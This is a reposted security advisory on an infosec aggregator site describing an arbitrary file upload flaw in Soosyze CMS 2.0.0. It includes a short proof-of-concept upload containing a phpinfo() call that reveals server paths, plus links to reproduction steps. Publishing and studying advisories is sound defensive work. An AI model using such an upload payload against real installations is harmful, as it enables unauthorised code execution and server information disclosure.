Exploit/Advisories

Published on September 9th, 2023 📆 | 1696 Views ⚑

0

Soosyze 2.0.0 Arbitrary File Upload – Torchsec

## Title: soosyze 2.0.0 - File Upload
## Author: nu11secur1ty
## Date: 04.26.2023-08.28.2023
## Vendor: https://soosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
## Reference: https://portswigger.net/web-security/file-upload

## Description:
Broken file upload logic. The malicious user can upload whatever he
wants to an HTML file and when he tries to execute it he views almost
all
file paths. This could be worse than ever, it depends on the scenario.

STATUS: HIGH Vulnerability

[+]Exploit:
```HTML

Hello broken file upload logic, now I can read your special<br />directory pats, thank you 😉

phpinfo();
?>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)

## Time spend:
01:27:00

Tagged with: 2.0.0 • arbitrary • File • soosyze • torchsec • upload

Leave a Reply Cancel reply

🌟 Your Account

Username/Email Password
Remember Me
Register
🔔 Email Subscriptions

Get new posts by email
- Donate Via Wallets
  MetaMask
  
  Trust Wallet
  
  Binance Wallet
  
  WalletConnect
Feed

Debian Security Advisory 5507-1 – Torchsec
30 September 2023
—–BEGIN PGP SIGNED MESSAGE—–Hash: SHA512 – ————————————————————————-Debian Security Advisory DSA-5507-1 security@debian.orghttps://www.debian.org/security/ Markus KoschanySeptember 28, 2023 🔎
Gentoo Linux Security Advisory 202310-01 – Torchsec
2 October 2023
– – – – – – – – – – – – – – – 🔎
Gentoo Linux Security Advisory 202309-14 – Torchsec
29 September 2023
– – – – – – – – – – – – – – – 🔎
A Practical Guide for Businesses Considering Gen AI
2 October 2023
Generative AI produces outputs with increasing similarity to human-generated content — and with exponentially greater 🔎
Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality – Torchsec
2 October 2023
Electrolink FM/DAB/TV Transmitter SuperAdmin Hidden Functionality Vendor: Electrolink s.r.l.Product web page: https://www.electrolink.comAffected version: 10W, 100W, 🔎
Popular
- A New Cybercrime Group Linked to 7 Ransomware Families by Admin September 26, 2023 Cybersecurity experts have shed light on a new cybercrime group… (10)
- Mozilla: Your New Car Is a Data Privacy Nightmare by Admin September 13, 2023 Eighty-four percent of the brands that researchers studied share or… (8)
- GitHub Repositories Hit by Password-Stealing Commits… by Admin September 28, 2023 Sep 28, 2023THNSupply Chain / Malware A new malicious campaign… (7)
- NVClient 5.0 Stack Buffer Overflow – Torchsec by Admin September 4, 2023 # Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)#… (6)
Gloss
- beeg on New Report Uncovers Three Distinct Clusters of China-Nexus Attacks on Southeast Asian Government
- great 126rt on New Report Uncovers Three Distinct Clusters of China-Nexus Attacks on Southeast Asian Government
- More info on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Hyperbaric Oxygen เชียงใหม่ on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- sga508 on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- inpatient detox near me on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- buy auto instagram followers on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Source URL on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Click here on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- adding a wall to a finished basement on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
☕️Social Media

Torchsec

Tweets by Torch_sec
👥Members

Newest | Active | Popular
- Louie Hursey
  
  registered 3 days, 9 hours ago
- Michell Real
  
  registered 1 week, 2 days ago
- Maryjo Combes
  
  registered 1 week, 2 days ago
- Janina Midgette
  
  registered 2 weeks, 3 days ago
- Lola Reiter
  
  registered 2 weeks, 3 days ago
🌍 Forum Groups

Newest | Active | Popular | Alphabetical
- General Talk
  
  active 3 days, 9 hours ago
- Help Me !!
  
  active 3 days, 9 hours ago
- Comments & Suggestions
  
  active 3 days, 9 hours ago
- Ebooks – Papers
  
  active 3 days, 9 hours ago
- Embedded Systems, Electronics, Gadgets, and DIY
  
  active 3 days, 9 hours ago
linktr.ee/obewyn

We share and comment on interesting infosec related news, tools and more. Follow us on RSS ,Facebook or Twitter for the latest updates. Torchsec is designed to help Auditors, Pentesters & Security Experts to keep their ethical hacking oriented toolbox up-to-date .
This website is made for educational and ethical testing purposes only。It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this website.

Archives

© Torchsec Privacy Policy Disclaimer T&C

Back to Top ↑